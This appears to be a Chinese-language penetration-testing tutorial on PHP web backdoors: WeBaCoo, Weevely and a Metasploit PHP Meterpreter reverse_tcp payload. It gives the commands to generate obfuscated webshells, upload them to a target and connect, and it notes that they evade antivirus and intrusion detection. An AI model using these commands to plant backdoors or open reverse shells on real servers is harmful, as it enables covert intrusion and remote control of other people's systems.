WeBaCoo

WeBaCoo（Web Backdoor Cookie）是一款隱蔽的指令碼類Web後門工具。藉助HTTP協議，它可以在客戶端和伺服器端實現執行程式碼的網頁終端。

WeBaCoo有兩種工作模式：

• Generation（生產線模式）：指定-g選項可進入這種模式。使用者可以在這種模式下製作PHP程式碼的payload
• Terminal（終端模式）：指定-t選項可進入這種模式，使用者可以在這種模式下連線到被測主機的後門程式。

WeBaCoo的精妙之處在於，Web伺服器和客戶端之間的通訊載體是Cookie。這就意味著多數的防毒軟體、網路入侵檢測/防禦系統、網路防火牆和應用程式防火牆都無法檢測到後門的所在。

WeBaCoo的HTTP Cookie中以下三個引數最為重要：

• cm:以base64編碼的shell指令
• cn:載入著編碼後輸出內容的Cookie名稱
• cp：封裝編碼後輸出內容的分隔符

如需啟動WeBaCoo程式，可以在終端輸入下述命令：

與生成模式有關的命令列選項如下：

如果要使用預設的設定，生成名為test.php的PHP後門程式，並使用WeBaCoo的程式碼混淆技術對後門進行處理，那麼可以使用下述命令

webacoo  -g    -o    test.php

檔案test.php內容如下：

而後，包這個檔案上傳到被測主機上去

接下來就可以使用下面的命令連線到被測主機的後門程式了：

webacoo -t -u http://ip/test.php

WeBaCoo後門的客戶端和伺服器端的通訊是不易發現的、

Weevely

Weevely是一款具有高隱蔽性的針對PHP平臺的WEBShell。它實現了SSH風格的終端介面，並有大量自動化的模組。測試人員可用它來執行系統命令、遠端管理和滲透後期的自動滲透介面。

Weevely的主要用途是：

• 生成混淆的PHP backdoor
• 在影象檔案中追加多型後門程式，並可以通過。htaccess檔案賦予影象檔案執行許可權。
• 生成後門。htaccess檔案。
• 可通過help選項列出程式的全部模組和生成工具

使用夏磊指令可以生成混淆PHP backdoor，並將後門儲存為display.php

weevely generate password display.php

之後還是以一樣，上傳到目標機器上

之後連結WEBshell即可

PHP Meterpreter

Metasploit有一個名為PHP Meterpreter的payload。這個模組可以建立具有Meterpreter功能的PHP webShell。利用目標的漏洞（諸如常見的注入、檔案上傳漏洞）之後，再把它的shell傳到目標主機即可。

Metasploit 的msfvenom工具可以製作PHP Meterpreter，具體指令如下：

msfvenom -p  php/meterpreter/reverse_tcp LHOST=192.168.x.x   -f   raw >php-meter.php

上述指令各選項的作用如下：

-p :指定payload為php/meterpreter/reverse_tcp

-f：設定輸出格式（raw）

LHOST :設定目標主機的IP地址

Metasploit會把生成的PHP Meterpreter儲存為檔案php-mter.php。